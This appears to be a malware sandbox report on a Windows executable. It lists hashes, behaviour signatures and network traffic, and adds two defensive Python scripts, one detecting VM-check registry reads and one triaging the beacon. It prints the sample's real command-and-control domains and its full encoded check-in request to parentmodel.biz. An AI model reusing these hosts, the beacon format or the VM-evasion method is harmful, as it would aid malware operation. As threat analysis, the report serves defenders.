Analysis

  • max time kernel
    151s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64  arch:x86  image:win10v2004-20220812-en  locale:en-us  os:windows10-2004-x64  system
  • submitted
    19/10/2022, 20:55 UTC

General

  • Target

    6689f183a1881261e2abffb51838acdcb447180fd1c8e910c46a69fb789713f1.exe

  • Size

    380KB

  • MD5

    820ada49121a00b93b63799995128c12

  • SHA1

    b853ebbbed8ab216ee710d224daec9df4b5a3395

  • SHA256

    6689f183a1881261e2abffb51838acdcb447180fd1c8e910c46a69fb789713f1

  • SHA512

    a27c1057f63c4f868a47dad00e1c89b64262fe6302b66cea35c73e876496049ba176b858fa46a80157c137e209eaf0d40aa0f2ba03af6d1f50b6bcee3f118834

  • SSDEEP

    6144:mzjowCMQQf6DI5aKt8e007RickUv5H5L9STCF2B5DNR2CDMf:miMIIQW0a3v5HjS+2BVN8CDMf

Score
6/10

Malware Config

Signatures

  • Maps connected drives based on registry (3 TTPs, 2 IoCs)

    Disk and drive information is often read from the registry to detect sandbox or virtual-machine environments: the device identifiers stored there carry the hypervisor vendor's strings.

  • Drops file in Windows directory (1 IoC)
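The first signature above is raised on registry reads that enumerate attached disks. As an added example (my code, not the sandbox's signature logic, which this page does not show), the detector below runs over a constructed API trace in a simple `pid api key [= data]` layout and flags any process that touches two or more keys from a list of common drive-enumeration paths, recording hypervisor vendor strings found in the values read back. The key list, the trace lines and the `VBOX` identifier in them are assumptions for illustration; the report gives the sample's two IoCs only by count.

```python
import re
from collections import defaultdict

# Registry paths commonly read to enumerate attached disks. This list is an
# assumption of this example, not the sandbox's signature definition (the page
# gives the sample's two IoCs only by count). Compared case-insensitively.
DRIVE_ENUM_KEYS = (
    r"SYSTEM\CURRENTCONTROLSET\SERVICES\DISK\ENUM",
    r"SYSTEM\CURRENTCONTROLSET\ENUM\IDE",
    r"SYSTEM\CURRENTCONTROLSET\ENUM\SCSI",
    r"SYSTEM\MOUNTEDDEVICES",
)

# Hypervisor vendor strings that show up in disk device identifiers on a VM.
VM_MARKERS = ("VBOX", "VMWARE", "QEMU", "VIRTUAL", "XEN")

# Constructed API-trace lines in a simple "pid api key [= data]" layout (my own
# format, not the sandbox's). PID 1380 plays the sample; 2044 is benign noise.
SAMPLE_TRACE = r"""
1380 RegOpenKeyExW HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Disk\Enum
1380 RegQueryValueExW HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Disk\Enum\0 = IDE\DiskVBOX_HARDDISK___________________________1.0_____\5&2c2e8a7f&0&0.0.0
1380 RegOpenKeyExW HKEY_LOCAL_MACHINE\SYSTEM\MountedDevices
1380 RegQueryValueExW HKEY_LOCAL_MACHINE\SYSTEM\MountedDevices\\DosDevices\C:
2044 RegOpenKeyExW HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
2044 RegQueryValueExW HKEY_CURRENT_USER\Control Panel\International\sLanguage = ENU
"""

LINE_RE = re.compile(r"^(\d+)\s+(\w+)\s+(\S.*?)(?:\s=\s(.*))?$")
HIVE_PREFIXES = ("HKEY_LOCAL_MACHINE\\", "HKLM\\")


def normalise(key: str) -> str:
    """Upper-case the path and strip the HKLM hive prefix so keys compare uniformly."""
    key = key.upper()
    for prefix in HIVE_PREFIXES:
        if key.startswith(prefix):
            return key[len(prefix):]
    return key


def match_drive_key(norm_key: str):
    """Return the drive-enumeration key that norm_key is, or lies under; else None."""
    for target in DRIVE_ENUM_KEYS:
        if norm_key == target or norm_key.startswith(target + "\\"):
            return target
    return None


def detect_drive_mapping(trace: str, min_keys: int = 2) -> list:
    """Group registry accesses per PID and report PIDs that touch at least
    min_keys distinct drive-enumeration keys, with any VM vendor strings seen
    in the data they read back."""
    per_pid = defaultdict(lambda: {"keys": set(), "vm_markers": set()})
    for raw in trace.strip().splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # not a registry line in the expected layout
        pid, _api, key, data = m.groups()
        target = match_drive_key(normalise(key))
        if target is None:
            continue
        rec = per_pid[int(pid)]
        rec["keys"].add(target)
        if data:
            rec["vm_markers"].update(v for v in VM_MARKERS if v in data.upper())
    return [
        {"pid": pid, "keys": sorted(rec["keys"]), "vm_markers": sorted(rec["vm_markers"])}
        for pid, rec in sorted(per_pid.items())
        if len(rec["keys"]) >= min_keys
    ]


if __name__ == "__main__":
    for hit in detect_drive_mapping(SAMPLE_TRACE):
        print(f"PID {hit['pid']}: maps drives via {len(hit['keys'])} keys; "
              f"VM markers in data: {hit['vm_markers'] or 'none'}")
```

Requiring two distinct keys rather than one keeps ordinary software that opens MountedDevices alone below the threshold; the vendor-string check is what separates "enumerated the disks" from "enumerated the disks and could see it is a VM".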

Processes

  • C:\Users\Admin\AppData\Local\Temp\6689f183a1881261e2abffb51838acdcb447180fd1c8e910c46a69fb789713f1.exe (PID 1380)
    Command line: "C:\Users\Admin\AppData\Local\Temp\6689f183a1881261e2abffb51838acdcb447180fd1c8e910c46a69fb789713f1.exe"
    • Maps connected drives based on registry
    • Drops file in Windows directory

Network

  • DNS  [US]  resolver 8.8.8.8:53
    Process: 6689f183a1881261e2abffb51838acdcb447180fd1c8e910c46a69fb789713f1.exe
    Request:  parentmodel.biz IN A
    Response: parentmodel.biz IN A 58.158.177.102
  • HTTP  [JP]  58.158.177.102:80
    Process: 6689f183a1881261e2abffb51838acdcb447180fd1c8e910c46a69fb789713f1.exe
    URL: http://parentmodel.biz/?q=lJ6N09%2FVjdHKRucYSUniNUe%2FQ8Y8Y4lZO6CcV3kpkcaDcXGHADBLO2ZbA9h7MWYB%2FMIAhkkZY3qiskUWOz7xmiNb33cwZxGLgCCpmuWpRTo9BBnD479Uv2qhne%2Fa9RC81t67ijPTNjpD4yYsvNL81eeA7YQ8hOwOg7CoEqxWfaSuz4mpeJsWtfjxjEXjDGgSuice8ytVtILaAMMICDtyXN%2F8wEYe7nKkqWV6Qrlsc5m7G%2F5GPxJIlLT1KG2j3r5HcCac1%2BgEDwGhVM8pMWQM3%2BTwy9%2F0DTMzkA0EX%2BU0W%2BM%2FIq1e38LP1dD7%2BKwKtXALpjIr%2F%2Bs4LS%2FHZn%2FXmTvat
    Request:
    GET /?q=lJ6N09%2FVjdHKRucYSUniNUe%2FQ8Y8Y4lZO6CcV3kpkcaDcXGHADBLO2ZbA9h7MWYB%2FMIAhkkZY3qiskUWOz7xmiNb33cwZxGLgCCpmuWpRTo9BBnD479Uv2qhne%2Fa9RC81t67ijPTNjpD4yYsvNL81eeA7YQ8hOwOg7CoEqxWfaSuz4mpeJsWtfjxjEXjDGgSuice8ytVtILaAMMICDtyXN%2F8wEYe7nKkqWV6Qrlsc5m7G%2F5GPxJIlLT1KG2j3r5HcCac1%2BgEDwGhVM8pMWQM3%2BTwy9%2F0DTMzkA0EX%2BU0W%2BM%2FIq1e38LP1dD7%2BKwKtXALpjIr%2F%2Bs4LS%2FHZn%2FXmTvat HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
    Host: parentmodel.biz
    Response:
    HTTP/1.1 200 OK
    Date: Thu, 20 Oct 2022 01:37:16 GMT
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips
    Last-Modified: Mon, 30 Nov 2015 13:48:40 GMT
    ETag: "9-525c24c725e00"
    Accept-Ranges: bytes
    Content-Length: 9
    Content-Type: text/html; charset=UTF-8
  • DNS  [US]  resolver 8.8.8.8:53
    Process: 6689f183a1881261e2abffb51838acdcb447180fd1c8e910c46a69fb789713f1.exe
    Request:  allmodel-pro.com IN A
    Response: allmodel-pro.com IN A 193.166.255.171
  • DNS  [US]  resolver 8.8.8.8:53
    Process: (none attributed)
    Request:  14.110.152.52.in-addr.arpa IN PTR
    Response: (not shown in the report)
  • Connections
    Where two figures are given they are sent / received: the DNS rows' 61 B and 62 B are exactly the size of the two A queries and 77 B / 78 B the size of their answers. Rows with a single figure carried traffic in one direction only. Only four rows name a process; "sample" stands for 6689f183a1881261e2abffb51838acdcb447180fd1c8e910c46a69fb789713f1.exe, and the remaining connections have no process attributed in the report.

    remote               domain                      proto  process  bytes          packets
    58.158.177.102:80    parentmodel.biz             http   sample   788 B / 400 B  5 / 3
                         HTTP request: GET (the request listed under HTTP above); HTTP response: 200
    193.166.255.171:80   allmodel-pro.com            -      sample   104 B          2
    93.184.220.29:80     -                           -      -        322 B          7
    93.184.220.29:80     -                           -      -        260 B          5
    104.110.191.140:80   -                           -      -        322 B          7
    209.197.3.8:80       -                           -      -        46 B / 40 B    1 / 1
    93.184.220.29:80     -                           -      -        46 B / 40 B    1 / 1
    40.79.150.121:443    -                           -      -        322 B          7
    209.197.3.8:80       -                           -      -        46 B / 40 B    1 / 1
    178.79.208.1:80      -                           -      -        322 B          7
    178.79.208.1:80      -                           -      -        322 B          7
    178.79.208.1:80      -                           -      -        322 B          7
    8.8.8.8:53           parentmodel.biz             dns    sample   61 B / 77 B    1 / 1
                         DNS request: parentmodel.biz; DNS response: 58.158.177.102
    8.8.8.8:53           allmodel-pro.com            dns    sample   62 B / 78 B    1 / 1
                         DNS request: allmodel-pro.com; DNS response: 193.166.255.171
    8.8.8.8:53           14.110.152.52.in-addr.arpa  dns    -        72 B / 146 B   1 / 1
                         DNS request: 14.110.152.52.in-addr.arpa (PTR); no answer shown in the report
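The HTTP entry above is the sample's check-in: one GET to parentmodel.biz carrying an opaque q= value, sent with a User-Agent that claims Chrome 37 on Windows NT 6.3 (Windows 8.1) even though the run was on windows10-2004_x64, so the string is hard-coded in the binary rather than taken from the host, and answered with a 200 whose headers (Content-Length 9, Last-Modified from 2015, an ETag encoding that 9-byte size) are consistent with a static 9-byte file rather than a generated tasking reply. The triage script below is an added example (my code, not part of the report or of the sample) that pulls the q= parameter out of the request exactly as listed, checks whether it is well-formed standard base64, decodes the longest well-formed prefix and reports its entropy and printable ratio, and flags the User-Agent/platform mismatch. Standard base64 never yields a length of 1 (mod 4), which is what this blob has, so either the listing truncated it or the encoding is custom; the decoder therefore stops at the last 4-aligned boundary. Function and field names are mine.

```python
import base64
import math
import re
import string
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# The beacon request as it appears in the sandbox's network listing (copied from the report).
BEACON_URL = (
    "http://parentmodel.biz/?q=lJ6N09%2FVjdHKRucYSUniNUe%2FQ8Y8Y4lZO6CcV3kpkcaDcXGHADBLO2ZbA9h7MWYB"
    "%2FMIAhkkZY3qiskUWOz7xmiNb33cwZxGLgCCpmuWpRTo9BBnD479Uv2qhne%2Fa9RC81t67ijPTNjpD4yYsvNL81eeA7YQ8h"
    "OwOg7CoEqxWfaSuz4mpeJsWtfjxjEXjDGgSuice8ytVtILaAMMICDtyXN%2F8wEYe7nKkqWV6Qrlsc5m7G%2F5GPxJIlLT1KG"
    "2j3r5HcCac1%2BgEDwGhVM8pMWQM3%2BTwy9%2F0DTMzkA0EX%2BU0W%2BM%2FIq1e38LP1dD7%2BKwKtXALpjIr%2F%2Bs4LS"
    "%2FHZn%2FXmTvat"
)
BEACON_USER_AGENT = ("Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 "
                     "(KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36")
# NT version of the sandbox platform: the run was windows10-2004_x64, and Windows 10 is NT 10.0.
SANDBOX_NT_VERSION = "10.0"

B64_ALPHABET = frozenset(string.ascii_letters + string.digits + "+/")


def extract_q(url: str) -> str:
    """Return the URL-decoded q= value (%2F -> '/', %2B -> '+')."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)["q"][0]


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: close to 8 for encrypted or compressed data, well below for text."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def characterise_blob(blob: str) -> dict:
    """Check whether blob is well-formed standard base64 and describe what it decodes to.

    A standard encoder never emits a length of 1 (mod 4); when that is seen the blob was
    truncated or uses a custom scheme, so only the longest 4-aligned prefix is decoded.
    Lengths of 2 or 3 (mod 4) are just unpadded and get their '=' padding restored.
    """
    core = blob.rstrip("=")
    in_alphabet = set(core) <= B64_ALPHABET
    rem = len(core) % 4
    usable = core[:-1] if rem == 1 else core
    decoded = b""
    if in_alphabet:
        try:
            decoded = base64.b64decode(usable + "=" * (-len(usable) % 4), validate=True)
        except ValueError:  # binascii.Error is a ValueError
            decoded = b""
    printable = sum(0x20 <= b < 0x7F for b in decoded)
    return {
        "length": len(blob),
        "base64_alphabet": in_alphabet,
        "length_mod_4": rem,
        "decoded_len": len(decoded),
        "head_hex": decoded[:3].hex(),
        "entropy_bits": round(shannon_entropy(decoded), 2),
        "printable_ratio": round(printable / len(decoded), 2) if decoded else 0.0,
    }


def ua_os_mismatch(user_agent: str, platform_nt_version: str) -> bool:
    """True when the UA claims a Windows NT version other than the host's, i.e. the
    string is hard-coded and therefore usable as a stable network signature."""
    m = re.search(r"Windows NT (\d+\.\d+)", user_agent)
    return m is not None and m.group(1) != platform_nt_version


def triage_beacon(url: str = BEACON_URL, user_agent: str = BEACON_USER_AGENT) -> dict:
    """Combine the blob analysis with the host and UA checks into one record."""
    result = characterise_blob(extract_q(url))
    result["host"] = urlsplit(url).hostname
    result["hardcoded_ua"] = ua_os_mismatch(user_agent, SANDBOX_NT_VERSION)
    return result


if __name__ == "__main__":
    for key, value in triage_beacon().items():
        print(f"{key}: {value}")
```

The first decoded bytes (0x94 0x9e 0x8d) are not printable, so whatever the blob carries, it is not plain text in a base64 wrapper; the entropy and printable-ratio fields are there to make that judgement on a blob you have not looked at by hand. The hard-coded UA plus the fixed `/?q=` shape is the part worth turning into a network signature.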

MITRE ATT&CK Enterprise v6

Downloads

  • memory/1380-132-0x0000000003E00000-0x0000000003E2F000-memory.dmp (188KB)
  • memory/1380-136-0x0000000006410000-0x0000000006437000-memory.dmp (156KB)
